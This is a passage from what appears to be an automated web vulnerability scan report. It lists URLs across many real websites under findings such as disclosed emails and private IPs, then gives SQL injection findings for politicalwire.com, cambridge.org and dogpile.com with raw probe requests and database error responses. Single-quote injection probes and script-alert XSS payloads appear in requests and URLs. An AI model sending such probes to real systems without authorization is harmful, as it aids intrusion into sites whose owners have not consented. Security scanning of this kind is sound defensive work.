12.32. http://www.dogpile.com/

12.33. http://www.dogpile.com/dogpile/ws/about/

12.34. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11

12.35. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11

12.36. http://www.dogpile.com/dogpile/ws/faq/

12.37. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

12.38. http://www.dogpile.com/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/

12.39. http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11

12.40. http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11

12.41. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11

12.42. http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11

12.43. http://www.dogpile.com/dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11

12.44. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11

12.45. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11

12.46. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11

12.47. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11

12.48. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11

12.49. http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11

12.50. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11

12.51. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11

12.52. http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11

12.53. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11

12.54. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11

12.55. http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

12.56. http://www.dogpile.com/dogpile_other/ws/index

12.57. http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11

12.58. http://www.dogpile.com/dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11

12.59. http://www.dogpile.com/dogpile_other/ws/index/qcat=News/_iceUrlFlag=11

12.60. http://www.dogpile.com/dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11

12.61. http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11

12.62. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11

12.63. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11

12.64. http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11

12.65. http://www.dogpile.com/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11

12.66. http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11

12.67. http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

12.68. http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11

12.69. http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7

12.70. http://www.dogpile.com/dogpile_other/ws/termsofuse/_iceUrlFlag=11

12.71. http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11

12.72. http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes

12.73. http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant

12.74. http://www.dogpile.com/dogpile_rss/web/MLB+Schedule

12.75. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11

12.76. http://www.dogpile.com/dogpile_rss/ws/aboutresults/_iceUrlFlag=11

12.77. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11

12.78. http://www.dogpile.com/dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11

12.79. http://www.dogpile.com/dogpile_rss/ws/index/

12.80. http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11

12.81. http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11

12.82. http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11

12.83. http://www.dogpile.com/dogpile_rss/ws/preferences/_iceUrlFlag=11

12.84. http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

12.85. http://www.dogpile.com/dogpile_rss/ws/privacy/_iceUrlFlag=11

12.86. http://www.dogpile.com/dogpile_rss/ws/termsofuse/_iceUrlFlag=11

12.87. http://www.hy-vee.com/favicon.ico

12.88. http://www.jillianmichaels.com/favicon.ico

12.89. http://www.mercantila.com/

12.90. http://www.nolo.com/favicon.ico

12.91. http://www.ny1.com/App_Skins/News1/Scripts/functions.js

12.92. http://www.ny1.com/Content/ServeContent.aspx

12.93. http://www.pg.com/favicon.ico

12.94. http://www.phonedog.com/favicon.ico

12.95. http://www.qctimes.com/favicon.ico

12.96. http://www.soccer.com/favicon.ico

12.97. http://www.tonzr.com/favicon.ico

12.98. http://www.wkyt.com/favicon.ico

12.99. http://www.wndu.com/favicon.ico

12.100. http://www.wsaz.com/favicon.ico

13. Email addresses disclosed

13.1. http://investor.infospaceinc.com/phoenix.zhtml

13.2. http://s.meebocdn.net/cim/script/meebo_cim_v88_cim_9_4_6.js

13.3. http://www.163.com/favicon.ico

13.4. http://www.amatura.com/favicon.ico

13.5. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49

13.6. http://www.atmovs.com/favicon.ico

13.7. http://www.cambridge.org/contacts/

13.8. http://www.cambridge.org/uk/404_error.asp

13.9. http://www.cambridge.org/uk/catalogue/viewBasket.asp

13.10. http://www.cappex.com/favicon.ico

13.11. http://www.car-part.com/favicon.ico

13.12. http://www.colorado.edu/favicon.ico

13.13. http://www.conceptcarz.com/favicon.ico

13.14. http://www.dailydealfetcher.com/Theme/js/jquery.cookie.js

13.15. http://www.dmvnow.com/exec/common/textsizer.js

13.16. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11

13.17. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11

13.18. http://www.family-pics.net/favicon.ico

13.19. http://www.fender.com/favicon.ico

13.20. http://www.fueleconomy.gov/favicon.ico

13.21. http://www.imapcast.com/favicon.ico

13.22. http://www.infospaceinc.com/contactus.aspx

13.23. http://www.metapress.com/favicon.ico

13.24. http://www.my-junior-sister.net/favicon.ico

13.25. http://www.mycountdown.org/favicon.ico

13.26. http://www.net-temps.com/favicon.ico

13.27. http://www.noaawatch.gov/favicon.ico

13.28. http://www.outspark.com/favicon.ico

13.29. http://www.overtons.com/favicon.ico

13.30. http://www.palomar.edu/favicon.ico

13.31. http://www.progressiveagent.com/favicon.ico

13.32. http://www.quartalflife.com/favicon.ico

13.33. http://www.quickyellow.com/scripts/v3/js/jquery.colorbox-min.js

13.34. http://www.stvid.com/favicon.ico

13.35. http://www.ucsc.edu/favicon.ico

13.36. http://www.viagra.com/common/js/lib/s_code.js

13.37. http://www.viagra.com/common/swf/js/s_code.js

13.38. http://www.wsaz.com/favicon.ico

14. Private IP addresses disclosed

14.1. http://manhattan.ny1.com/content/top_stories/

14.2. http://static.ak.connect.facebook.com/connect.php/en_US

14.3. http://www.allforgold.com/favicon.ico

14.4. http://www.consolelegends.com/favicon.ico

14.5. http://www.holidayscentral.com/favicon.ico

14.6. http://www.jobtarget.com/favicon.ico

14.7. http://www.jpcycles.com/favicon.ico

14.8. http://www.la-z-boy.com/favicon.ico

14.9. http://www.ny1.com/favicon.ico

14.10. http://www.ny1.com/favicon.ico

14.11. http://www.psasurveys.com/favicon.ico

14.12. http://www.pscufs.com/favicon.ico

14.13. http://www.queerty.com/favicon.ico

14.14. http://www.thoughtprojects.com/favicon.ico

14.15. http://www.tvseriesfinale.com/favicon.ico

15. Credit card numbers disclosed

15.1. http://a.collective-media.net/adj/ns.androidtapp/general

15.2. http://pubads.g.doubleclick.net/gampad/ads

15.3. http://s.aeriagames.com/misc/ads/error_banner_en.html

16. HTML does not specify charset

16.1. http://ad.doubleclick.net/adi/N3941.5122.NY1/B5147666.2

16.2. http://ad.doubleclick.net/pfadx/aeriagames_cim/

16.3. http://ds.addthis.com/red/psi/sites/dogpile.com/p.json

16.4. http://ds.addthis.com/red/psi/sites/www.dogpile.com/p.json

16.5. http://fls.doubleclick.net/activityi

16.6. http://uac.advertising.com/wrapper/aceUACping.htm

16.7. http://view.c3metrics.com/c3VTabstrct-6-2.php

16.8. http://view.c3metrics.com/v.js

16.9. http://www.4jobs.com/favicon.ico

16.10. http://www.800adfrenzy.com/favicon.ico

16.11. http://www.accessmycardonline.com/favicon.ico

16.12. http://www.activediner.com/favicon.ico

16.13. http://www.aeriagames.com/favicon.ico

16.14. http://www.affairsclub.com/favicon.ico

16.15. http://www.afterellen.com/favicon.ico

16.16. http://www.allthumbshost.com/favicon.ico

16.17. http://www.amazingfreerewards.com/favicon.ico

16.18. http://www.amazingrewardsonline.com/favicon.ico

16.19. http://www.americajob.com/favicon.ico

16.20. http://www.artsonia.com/favicon.ico

16.21. http://www.asset-cache.net/favicon.ico

16.22. http://www.astrocenter.com/favicon.ico

16.23. http://www.athletic.net/favicon.ico

16.24. http://www.auctionmicro.com/favicon.ico

16.25. http://www.bakati.com/favicon.ico

16.26. http://www.barelist.com/favicon.ico

16.27. http://www.betus.com/favicon.ico

16.28. http://www.biblestudytools.com/favicon.ico

16.29. http://www.big5sportinggoods.com/favicon.ico

16.30. http://www.bittybitznpieces.com/favicon.ico

16.31. http://www.bizbuysell.com/favicon.ico

16.32. http://www.blockbusterexpress.com/favicon.ico

16.33. http://www.bradsdeals.com/favicon.ico

16.34. http://www.bravoatk.com/favicon.ico

16.35. http://www.brownells.com/favicon.ico

16.36. http://www.buildacareer.net/favicon.ico

16.37. http://www.cambridge.org/date/writeYear_js.asp

16.38. http://www.cambridge.org/uk/date/writeYear_js.asp

16.39. http://www.careerplanner.com/favicon.ico

16.40. http://www.caring4cancer.com/favicon.ico

16.41. http://www.carsforsale.com/favicon.ico

16.42. http://www.cdn-businessweek.com/favicon.ico

16.43. http://www.cdn-thestreet.com/favicon.ico

16.44. http://www.centerpointenergy.com/favicon.ico

16.45. http://www.cheaperthandirt.net/favicon.ico

16.46. http://www.cheapostay.com/favicon.ico

16.47. http://www.clipartcastle.com/favicon.ico

16.48. http://www.codeplex.com/favicon.ico

16.49. http://www.covers.com/favicon.ico

16.50. http://www.custom404error.com/favicon.ico

16.51. http://www.dailytech.com/favicon.ico

16.52. http://www.demovirgins.net/favicon.ico

16.53. http://www.diapers.com/favicon.ico

16.54. http://www.dinodirect.com/favicon.ico

16.55. http://www.dltk-holidays.com/favicon.ico

16.56. http://www.ebaycoupon.us/favicon.ico

16.57. http://www.foodnetworkstore.com/favicon.ico

16.58. http://www.freebie-fusion.net/favicon.ico

16.59. http://www.frontdoor.com/favicon.ico

16.60. http://www.funnygranny.com/favicon.ico

16.61. http://www.galsarchive.com/favicon.ico

16.62. http://www.giggidy.com/favicon.ico

16.63. http://www.grammarbook.com/favicon.ico

16.64. http://www.gsnrecipes.com/favicon.ico

16.65. http://www.halloweenexpress.com/favicon.ico

16.66. http://www.hometeamsonline.com/favicon.ico

16.67. http://www.hotfile.com/favicon.ico

16.68. http://www.hqtoplist.com/favicon.ico

16.69. http://www.iforex.com/favicon.ico

16.70. http://www.iframes.us/favicon.ico

16.71. http://www.installiq.com/favicon.ico

16.72. http://www.installiqlearnmore.com/favicon.ico

16.73. http://www.insureme.com/favicon.ico

16.74. http://www.interweave.com/favicon.ico

16.75. http://www.jobappnetwork.com/favicon.ico

16.76. http://www.jobvite.com/favicon.ico

16.77. http://www.justppc.net/favicon.ico

16.78. http://www.k12jobspot.com/favicon.ico

16.79. http://www.kevinsmoneytree.org/favicon.ico

16.80. http://www.latinateens-blog.com/favicon.ico

16.81. http://www.leapfish.com/favicon.ico

16.82. http://www.lilumania.in/favicon.ico

16.83. http://www.mail2web.com/favicon.ico

16.84. http://www.maison-de-la-france.com/favicon.ico

16.85. http://www.maps.com/favicon.ico

16.86. http://www.massagegirls18.net/favicon.ico

16.87. http://www.meaning-of-names.com/favicon.ico

16.88. http://www.melaleuca.com/favicon.ico

16.89. http://www.metapress.com/favicon.ico

16.90. http://www.moneyzue.com/favicon.ico

16.91. http://www.mt.gov/favicon.ico

16.92. http://www.mydigitalpublication.com/favicon.ico

16.93. http://www.myhealthwealthandhappiness.com/favicon.ico

16.94. http://www.myhuckleberry.com/favicon.ico

16.95. http://www.newretirement.com/favicon.ico

16.96. http://www.news-medical.net/favicon.ico

16.97. http://www.newssearchonline.com/favicon.ico

16.98. http://www.nwf.org/favicon.ico

16.99. http://www.optimalfusion.com/favicon.ico

16.100. http://www.oview.com/favicon.ico

16.101. http://www.owners.com/favicon.ico

16.102. http://www.paulsnetwork.com/favicon.ico

16.103. http://www.personalizationmall.com/favicon.ico

16.104. http://www.printfree.com/favicon.ico

16.105. http://www.prize-pending.com/favicon.ico

16.106. http://www.quickyellow.com/favicon.ico

16.107. http://www.quizbar.net/favicon.ico

16.108. http://www.rcuniverse.com/favicon.ico

16.109. http://www.redrobin.com/favicon.ico

16.110. http://www.roirocket.com/favicon.ico

16.111. http://www.rubytuesday.com/favicon.ico

16.112. http://www.sanityswitch.com/favicon.ico

16.113. http://www.santanderconsumerusa.com/favicon.ico

16.114. http://www.scriptpulse.com/favicon.ico

16.115. http://www.searchzue.com/favicon.ico

16.116. http://www.seekysearch.net/favicon.ico

16.117. http://www.smartquote.com/favicon.ico

16.118. http://www.soap.com/favicon.ico

16.119. http://www.southwestvacations.com/favicon.ico

16.120. http://www.starbucksstore.com/favicon.ico

16.121. http://www.sulekha.com/favicon.ico

16.122. http://www.sun.com/favicon.ico

16.123. http://www.super-survey.com/favicon.ico

16.124. http://www.teenchat.com/favicon.ico

16.125. http://www.tennis-warehouse.com/favicon.ico

16.126. http://www.toonier.com/favicon.ico

16.127. http://www.tstickets.com/favicon.ico

16.128. http://www.tubedspots.com/favicon.ico

16.129. http://www.turbolovervidz.com/favicon.ico

16.130. http://www.ultra18.com/favicon.ico

16.131. http://www.usairwaysvacations.com/favicon.ico

16.132. http://www.venus.com/favicon.ico

16.133. http://www.w3i.com/favicon.ico

16.134. http://www.web.com/favicon.ico

16.135. http://www.williamsauction.com/favicon.ico

16.136. http://www.yellowusa.com/favicon.ico

16.137. http://www.youngcourtesans.com/favicon.ico

16.138. http://www.yourdegree.com/favicon.ico

17. HTML uses unrecognised charset

17.1. http://www.163.com/favicon.ico

17.2. http://www.soccer.com/favicon.ico

17.3. http://www.xiongdudu.com/favicon.ico

18. Content type incorrectly stated

18.1. http://ad.doubleclick.net/pfadx/aeriagames_cim/

18.2. http://event.adxpose.com/event.flow

18.3. http://view.c3metrics.com/c3VTabstrct-6-2.php

18.4. http://view.c3metrics.com/v.js

18.5. http://www.1800mobiles.com/favicon.ico

18.6. http://www.4jobs.com/favicon.ico

18.7. http://www.800adfrenzy.com/favicon.ico

18.8. http://www.activediner.com/favicon.ico

18.9. http://www.allheart.com/favicon.ico

18.10. http://www.alloy.com/favicon.ico

18.11. http://www.americajob.com/favicon.ico

18.12. http://www.artsonia.com/favicon.ico

18.13. http://www.astrocenter.com/favicon.ico

18.14. http://www.athletic.net/favicon.ico

18.15. http://www.bakati.com/favicon.ico

18.16. http://www.barelist.com/favicon.ico

18.17. http://www.bebe.com/favicon.ico

18.18. http://www.bellasugar.com/favicon.ico

18.19. http://www.betus.com/favicon.ico

18.20. http://www.biblestudytools.com/favicon.ico

18.21. http://www.biblio.com/favicon.ico

18.22. http://www.big5sportinggoods.com/favicon.ico

18.23. http://www.bizbuysell.com/favicon.ico

18.24. http://www.blockbusterexpress.com/favicon.ico

18.25. http://www.bradsdeals.com/favicon.ico

18.26. http://www.brainpop.com/favicon.ico

18.27. http://www.brownells.com/favicon.ico

18.28. http://www.buildacareer.net/favicon.ico

18.29. http://www.buzzsugar.com/favicon.ico

18.30. http://www.cambridge.org/date/writeYear_js.asp

18.31. http://www.cambridge.org/uk/date/writeYear_js.asp

18.32. http://www.careerplanner.com/favicon.ico

18.33. http://www.caring4cancer.com/favicon.ico

18.34. http://www.carsforsale.com/favicon.ico

18.35. http://www.casasugar.com/favicon.ico

18.36. http://www.cbsatlanta.com/favicon.ico

18.37. http://www.cheaperthandirt.net/favicon.ico

18.38. http://www.cheapostay.com/favicon.ico

18.39. http://www.clipartcastle.com/favicon.ico

18.40. http://www.codeplex.com/favicon.ico

18.41. http://www.covers.com/favicon.ico

18.42. http://www.craigslist.com.au/favicon.ico

18.43. http://www.craigslist.de/favicon.ico

18.44. http://www.custom404error.com/favicon.ico

18.45. http://www.dailystrength.org/favicon.ico

18.46. http://www.dailytech.com/favicon.ico

18.47. http://www.dealio.com/favicon.ico

18.48. http://www.deltadental.com/favicon.ico

18.49. http://www.diapers.com/favicon.ico

18.50. http://www.dinodirect.com/favicon.ico

18.51. http://www.directron.com/favicon.ico

18.52. http://www.dltk-holidays.com/favicon.ico

18.53. http://www.fabsugar.com/favicon.ico

18.54. http://www.findstuff.com/favicon.ico

18.55. http://www.foodnetworkstore.com/favicon.ico

18.56. http://www.frontdoor.com/favicon.ico

18.57. http://www.genealogybank.com/favicon.ico

18.58. http://www.greatdreams.com/favicon.ico

18.59. http://www.gsnrecipes.com/favicon.ico

18.60. http://www.hometeamsonline.com/favicon.ico

18.61. http://www.iforex.com/favicon.ico

18.62. http://www.inforum.com/favicon.ico

18.63. http://www.installiq.com/favicon.ico

18.64. http://www.installiqlearnmore.com/favicon.ico

18.65. http://www.insureme.com/favicon.ico

18.66. http://www.interweave.com/favicon.ico

18.67. http://www.jobappnetwork.com/favicon.ico

18.68. http://www.jobvite.com/favicon.ico

18.69. http://www.k12jobspot.com/favicon.ico

18.70. http://www.kitv.com/favicon.ico

18.71. http://www.klm.com/favicon.ico

18.72. http://www.ksat.com/favicon.ico

18.73. http://www.leapfish.com/favicon.ico

18.74. http://www.mail2web.com/favicon.ico

18.75. http://www.maps.com/favicon.ico

18.76. http://www.mattel.com/favicon.ico

18.77. http://www.meaning-of-names.com/favicon.ico

18.78. http://www.melaleuca.com/favicon.ico

18.79. http://www.mercantila-checkout.com/setcookie.js

18.80. http://www.mercantila.com/website/common/commonbroker.php

18.81. http://www.mercantila.com/website/shoppingcart/cartbroker.php

18.82. http://www.mirror.co.uk/favicon.ico

18.83. http://www.ms.gov/favicon.ico

18.84. http://www.mt.gov/favicon.ico

18.85. http://www.myhuckleberry.com/favicon.ico

18.86. http://www.mysun.co.uk/favicon.ico

18.87. http://www.nairaland.com/favicon.ico

18.88. http://www.naturallycurly.com/favicon.ico

18.89. http://www.newretirement.com/favicon.ico

18.90. http://www.news-medical.net/favicon.ico

18.91. http://www.nwf.org/favicon.ico

18.92. http://www.owners.com/favicon.ico

18.93. http://www.pennystockalley.com/favicon.ico

18.94. http://www.personalizationmall.com/favicon.ico

18.95. http://www.printfree.com/favicon.ico

18.96. http://www.puma.com/favicon.ico

18.97. http://www.rcuniverse.com/favicon.ico

18.98. http://www.redrobin.com/favicon.ico

18.99. http://www.rk.com/favicon.ico

18.100. http://www.roirocket.com/favicon.ico

18.101. http://www.rubytuesday.com/favicon.ico

18.102. http://www.sanityswitch.com/favicon.ico

18.103. http://www.shaadi.com/favicon.ico

18.104. http://www.soap.com/favicon.ico

18.105. http://www.southwestvacations.com/favicon.ico

18.106. http://www.starbucksstore.com/favicon.ico

18.107. http://www.strefa.pl/favicon.ico

18.108. http://www.sulekha.com/favicon.ico

18.109. http://www.syracuse.com/favicon.ico

18.110. http://www.tennis-warehouse.com/favicon.ico

18.111. http://www.theage.com.au/favicon.ico

18.112. http://www.tressugar.com/favicon.ico

18.113. http://www.tstickets.com/favicon.ico

18.114. http://www.venus.com/favicon.ico

18.115. http://www.w3i.com/favicon.ico

18.116. http://www.web.com/favicon.ico

18.117. http://www.williamsauction.com/favicon.ico

18.118. http://www.wlky.com/favicon.ico

18.119. http://www.worldwidelearn.com/favicon.ico

18.120. http://www.yellowusa.com/favicon.ico

18.121. http://www.yourdegree.com/favicon.ico

19. Content type is not specified

19.1. http://82.cim.meebo.com/cmd/tc

19.2. http://suggest.infospace.com/QuerySuggest/SuggestServlet

19.3. http://suggest.infospace.com/favicon.ico

19.4. http://webiq005.webiqonline.com/WebIQ/DataServer/HandlePageTag.srf

19.5. http://www.adleaf.com/favicon.ico

19.6. http://www.billoreilly.com/favicon.ico

19.7. http://www.cableone.net/favicon.ico

19.8. http://www.fender.com/favicon.ico

19.9. http://www.freelocaljob.com/favicon.ico

19.10. http://www.kraftbrands.com/favicon.ico

19.11. http://www.liasophia.com/favicon.ico

19.12. http://www.nicusa.com/favicon.ico

19.13. http://www.peopletopeople.com/favicon.ico

19.14. http://www.shtyle.fm/favicon.ico

19.15. http://www.smartauction.biz/favicon.ico

19.16. http://www.solow.com/favicon.ico

19.17. http://www.tangowire.com/favicon.ico

19.18. http://www.theupperfloor.com/favicon.ico



1. SQL injection
There are 4 instances of this issue:


1.1. http://politicalwire.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://politicalwire.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /favicon.ico' HTTP/1.1
Host: politicalwire.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 15:46:04 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Content-Length: 2389
Content-Type: text/html

<b>Error:</b> pdo error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/') or (fileinfo_url like '/favicon.ico'/index%'))
and te' at line 2] in EXECUT
...[SNIP]...

Request 2

GET /favicon.ico'' HTTP/1.1
Host: politicalwire.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not found
Date: Fri, 01 Apr 2011 15:46:06 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Content-Length: 22567
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

1.2. http://www.cambridge.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cambridge.org
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cambridge.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/6.0
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 283
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 16:20:01 GMT
Connection: close
Set-Cookie: ASPSESSIONIDAABDSSSR=KCLAEEPCNJAMKMPJHPPHKMKP; path=/
Set-Cookie: X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; path=/

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for Oracle</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>ORA-00911: invalid character
</font>
<p>
<fon
...[SNIP]...

1.3. http://www.dogpile.com/dogpile_other/ws/index [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com
Referer: http://www.google.com/search?hl=en&q='

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=ebd2addac4004eada5cac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:35 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:35 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:34 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
=true"); }
.addSearchProvider { background-image:url("http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/home_cloud.gif/_iceUrlFlag=15?_IceUrl=true"); }
.tellFriendError{background-image:url("http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/error_icn.gif/_iceUrlFlag=15?_IceUrl=true");}
.tellFriendSuccess{background-image:url("http://ttl60m.dp
...[SNIP]...

Request 2

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
